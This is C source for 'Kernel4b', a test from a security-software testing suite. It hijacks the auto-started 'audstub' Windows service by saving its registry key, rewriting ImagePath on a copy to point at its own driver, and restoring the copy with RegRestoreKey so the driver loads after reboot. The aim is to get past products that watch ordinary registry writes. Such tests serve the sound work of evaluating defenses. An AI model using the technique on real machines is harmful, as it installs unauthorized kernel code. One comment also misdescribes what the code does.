/*

 Security Software Testing Suite - Kernel4b (General bypassing test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Method description:

   * It is assumed that the system "audstub" driver is started automatically.

   * Change "ImagePath" value of the system "audstub" driver to our driver.

   * After the reboot our driver will be loaded.

   * The only difference, compared to the method of Kernel4, is that this program
     changes "ImagePath" value using RegRestoreKey() instead of RegSetValueKeyEx.

*/


#include <stdio.h>
#include <windows.h>
#include <shlwapi.h>
#include "include/common.h"
#include "include/common-hook.h"

// Full name of the driver's binary.
char drv_bin[MAX_PATH];


/*
 Converts registry key name in format "HKXX\SubKey" to HKEY constant and readonly subkey suffix.

 'key_name' A pointer to the key name in format "HKXX\SubKey".
 'parent_key' A pointer to a variable that receives HKEY value of the root key.
 'subkey' A pointer to a variable that receives a pointer to a subkey in 'key_name'.
 'err_inf' A pointer to a structure that will be filled with error message and code if an error occurs.

 The return value is TRUE if the function succeeds, FALSE otherwise.
*/

int reg_string_to_hkey_subkey(char *key_name,HKEY *parent_key,char **subkey,PCOM_ERROR err_inf)
{
  int res=FALSE;

  size_t klen=strlen(key_name);
  if (klen>=6)
  {
    char parent_name[5];
    memcpy(parent_name,key_name,4);
    parent_name[4]='\0';

    if (com_reg_root_name_to_hkey(parent_name,parent_key,err_inf))
    {
      *subkey=key_name+5;
      res=TRUE;
    } else com_err_set_nc(err_inf,"\"%s\" is not a valid key_name argument.\n",key_name);
  } else com_err_set_nc(err_inf,"\"%s\" is not a valid registry key name.\n",key_name);

  return res;
}


/*
 Opens and saves registry key to a specified file.

 'key_name' A name of the key to be saved. Its format must be "HKXX\SubKey".
 'file_name' A name of the file to which the key is to be stored.
 'err_inf' A pointer to a structure that will be filled with error message and code if an error occurs.

 The return value is TRUE if the function succeeds, FALSE otherwise.
*/

int reg_key_save_to_file(char *key_name,char *file_name,PCOM_ERROR err_inf)
{
  int res=FALSE;

  HKEY parent_key;
  char *subkey;
  if (reg_string_to_hkey_subkey(key_name,&parent_key,&subkey,err_inf))
  {
    HKEY key;
    LONG ret=RegOpenKeyEx(parent_key,subkey,0,KEY_READ,&key);
    if (ret==ERROR_SUCCESS)
    {
      if (com_verbosity_get()) printf("Registry key \"%s\" opened.\n",key_name);

      ret=RegSaveKey(key,file_name,NULL);
      RegCloseKey(key);

      if (ret==ERROR_SUCCESS)
      {
        if (com_verbosity_get()) printf("Registry key \"%s\" saved to \"%s\".\n",key_name,file_name);
        res=TRUE;
      } else com_err_set_sc(err_inf,ret,"Unable to save registry key \"%s\" to file \"%s\".\n",key_name,file_name);
    } else com_err_set_sc(err_inf,ret,"Unable to open registry key \"%s\".\n",key_name);
  }

  return res;
}


/*
 Creates key and restores its contents from a specified file.

 'key_name' A pointer to the key name in format "HKXX\SubKey".
 'file_name' A name of the file from which the key is to be restored.
 'err_inf' A pointer to a structure that will be filled with error message and code if an error occurs.

 The return value is TRUE if the function succeeds, FALSE otherwise.
*/

int reg_key_create_and_restore_from_file(char *key_name,char *file_name,PCOM_ERROR err_inf)
{
  int res=FALSE;

  HKEY parent_key;
  char *subkey;
  if (!reg_string_to_hkey_subkey(key_name,&parent_key,&subkey,err_inf)) return FALSE;

  HKEY key;
  LONG ret=RegCreateKeyEx(parent_key,subkey,0,NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
  if (ret==ERROR_SUCCESS)
  {
    if (com_verbosity_get()) printf("Registry key \"%s\" created.\n",key_name);

    ret=RegRestoreKey(key,file_name,0);
    RegCloseKey(key);

    if (ret==ERROR_SUCCESS)
    {
      if (com_verbosity_get()) printf("Registry key \"%s\" restored from file \"%s\".\n",key_name,file_name);
      res=TRUE;
    } else com_err_set_sc(err_inf,ret,"Unable to restore registry key \"%s\" from file \"%s\".\n",key_name,file_name);
  } else com_err_set_sc(err_inf,ret,"Unable to create registry key \"%s\".\n",key_name);

  return res;
}


/*
 Makes a copy of a key using save/restore registry functions.

 'key_src' A name of the key to be copied. Its format must be "HKXX\SubKey".
 'key_dst' A name of the key to be copied. Its format must be "HKXX\SubKey".
 'err_inf' A pointer to a structure that will be filled with error message and code if an error occurs.

 The return value is TRUE if the function succeeds, FALSE otherwise.
*/

int reg_key_copy_using_save_restore(char *key_src,char* key_dst,PCOM_ERROR err_inf)
{
  int res=FALSE;

  char buf[MAX_PATH];
  UINT ret=GetTempFileName(".","rsk",0,buf);
  if (ret)
  {
    if (com_verbosity_get()) printf("Temporary file name set to \"%s\".\n",buf);

    if (DeleteFile(buf))
      if (com_verbosity_get())
        printf("File \"%s\" deleted.\n",buf);

    res=reg_key_save_to_file(key_src,buf,err_inf)
     && reg_key_create_and_restore_from_file(key_dst,buf,err_inf);

    if (DeleteFile(buf))
      if (com_verbosity_get())
        printf("File \"%s\" deleted.\n",buf);
  } else com_err_set(err_inf,"Unable to generate temporary file name.\n");

  return res;
}


/*
 Opens a registry key and sets its value.

 'key_name' A name of the key in format "HKXX\SubKey".
 'value_name' A name of the value to be set.
 'value_type' A type of the value to be set. See 'dwType' parameter of RegSetValueEx() for more information.
 'value_data' The value itself. See 'lpData' parameter of RegSetValueEx() for more information.
 'value_data_size' A size of 'value_data'. See 'cbData' parameter of RegSetValueEx() for more information.
 'err_inf' A pointer to a structure that will be filled with error message and code if an error occurs.

 The return value is TRUE if the function succeeds, FALSE otherwise.
*/

int reg_key_value_set(char *key_name,char *value_name,DWORD value_type,PVOID value_data,DWORD value_data_size,PCOM_ERROR err_inf)
{
  int res=FALSE;

  HKEY parent_key;
  char *subkey;
  if (reg_string_to_hkey_subkey(key_name,&parent_key,&subkey,err_inf))
  {
    HKEY key;
    LONG ret=RegCreateKeyEx(parent_key,subkey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_SET_VALUE,NULL,&key,NULL);
    if (ret==ERROR_SUCCESS)
    {
      ret=RegSetValueEx(key,value_name,0,value_type,value_data,value_data_size);
      RegCloseKey(key);

      if (ret==ERROR_SUCCESS)
      {
        if (com_verbosity_get()) printf("Registry value \"%s\" was set in \"%s\".\n",value_name,key_name);
        res=TRUE;
      } else com_err_set_sc(err_inf,ret,"Unable to set registry value \"%s\" in key \"%s\".\n",value_name,key_name);
    } else com_err_set_sc(err_inf,ret,"Unable to open registry key \"%s\".\n",key_name);
  }

  return res;
}



/*
 Callback function prototype.
 The callback function is called in order to make the modification
 on the copy of the key that is to be modified.

 'tmp_key' A name of a temporary copy of the key that is to be modified. Its format must be "HKXX\SubKey".
 'err_inf' A pointer to a structure that will be filled with error message and code if an error occurs.

 The return value is TRUE if the function succeeds, FALSE otherwise.

*/

typedef int WINAPI (*REG_KEY_CALLBACK_MODIFY)(char *tmp_key,PCOM_ERROR err_inf);


/*
 Saves a key, which is to be modified, to a file and creates a temporary copy of this key.
 A modification callback is called on the copy of the key then and the modified copy is saved to a key again
 and finally restored to the original key.

 'key_name' A name of the key to modify. Its format must be "HKXX\SubKey".
 'tmp_key' A name of a temporary copy of the key that is to be modified. Its format must be "HKXX\SubKey".
 This key is deleted after the modification of the original key.
 'cb_func' A pointer to modification callback function. This function does the modification itself on
 a copy of the original key.
 'err_inf' A pointer to a structure that will be filled with error message and code if an error occurs.

 The return value is TRUE if the function succeeds, FALSE otherwise.
*/

int reg_key_modify_using_save_restore(char *key_name,char *tmp_key,REG_KEY_CALLBACK_MODIFY cb_func,PCOM_ERROR err_inf)
{
  int res=FALSE;

  if (com_privilege_enable_restore(err_inf)
   && com_privilege_enable_backup(err_inf))
  {
    if (reg_key_copy_using_save_restore(key_name,tmp_key,err_inf))
    {
      if (cb_func(tmp_key,err_inf))
        res=reg_key_copy_using_save_restore(tmp_key,key_name,err_inf);

      HKEY parent_key;
      char *subkey;
      if (!reg_string_to_hkey_subkey(tmp_key,&parent_key,&subkey,err_inf)) return FALSE;

      DWORD ret=SHDeleteKey(parent_key,subkey);
      if (ret==ERROR_SUCCESS)
        if (com_verbosity_get())
          printf("Registry key \"%s\" deleted.\n",tmp_key);
    }
  }

  return res;
}


/*
 Callback function, which is to be called by reg_key_modify_using_save_restore().

 Changes "ImagePath" value to empty string.

 'tmp_key' A name of the temporary copy of the original key.
 'err_inf' A pointer to a structure that will be filled with error message and code if an error occurs.

 The return value is TRUE if the function succeeds, FALSE otherwise.
*/

int WINAPI callback_modify(char *tmp_key,PCOM_ERROR err_inf)
{
  return reg_key_value_set(tmp_key,"ImagePath",REG_SZ,drv_bin,strlen(drv_bin)+1,err_inf);
}


int main(int argc,char **argv)
{
  COM_CONF conf;
  if (!com_console_init_main("Kernel4b","kernel4b",argc,argv,&conf,COM_TEST_TYPE_KERNEL4B)) return 1;

  char *used_dlls[]={"advapi32.dll"};
  if (!com_hook_load_libraries(used_dlls,1)) return 1;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  int res=FALSE;

  char cur_dir[MAX_PATH];
  if (com_get_module_path(NULL,cur_dir,sizeof(cur_dir),&err_inf))
  {
    snprintf(drv_bin,sizeof(drv_bin),"\\??\\%s\\drv.sys",cur_dir);
    drv_bin[sizeof(drv_bin)-1]='\0';

    res=reg_key_modify_using_save_restore("HKLM\\SYSTEM\\CurrentControlSet\\Services\\audstub","HKLM\\Software\\SSTSaudstub",
                                          callback_modify,&err_inf);
  }

  return com_end(res,&err_inf,&conf);
}
